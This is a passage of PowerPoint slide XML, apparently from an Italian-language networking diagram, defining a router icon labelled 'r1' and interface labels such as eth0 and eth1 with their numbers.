            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B745AA-BC95-3A02-9A36-2846CC169CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152303" y="2469897"/>
            <a:ext cx="49830" cy="283597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3" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F945B2E-D07B-1E71-FE70-6B2B91C5CE2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4911658" y="2892462"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9216" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B921E0-5810-C5FA-4384-28AC60D794F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9218" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1431CA95-A2C0-6C6E-369F-3A86CA8B1685}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819F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3025" tIns="36512" rIns="73025" bIns="36512"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it-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9219" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B43E57-333D-66DC-17F9-DDA16B1DBEC9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9221" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C061C8-26D5-39A7-B7FB-229627AB4E4C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9222" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5DFB54-0A55-43B3-3A84-75F517C4EA0D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 13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93" h="132">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9236" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E12E139-9DFC-F9A7-FB8F-6517602BF38D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28 h 12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92" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9238" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{485F52AA-5364-E21B-610B-95A4BEDF745B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="124">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9217" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11E2B7D-1678-5919-2768-53227B14CBE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9251" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF6AF4FB-A030-722E-D490-0A613F2E1D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5002404" y="2547001"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9252" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6B377E-C4BF-B26B-C40E-72684A147DF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9253" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDFB2B6-D6EA-7A63-FB1A-081842BEB522}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9254" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E67FE48-CDB2-711B-F869-F637D6D009E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4989256" y="3258486"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9255" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB66BB1-AD01-C363-6CCC-BC449B09F9AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9256" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7489B2F5-05E8-495D-5244-6CBD9AB92AA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9257" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A04B56-B034-E392-FFC7-4DC428FF5612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5008167" y="4928067"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9258" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112E5874-2985-E51E-856F-024B64C04C16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9259" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{658E5958-FAAF-2075-8C62-D2875818D88F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9260" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96674563-F241-194F-925C-4C9E8B01AC87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5013037" y="4230593"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9261" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FB7A3B4-CA8D-6008-2F75-2C2084D1D88F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
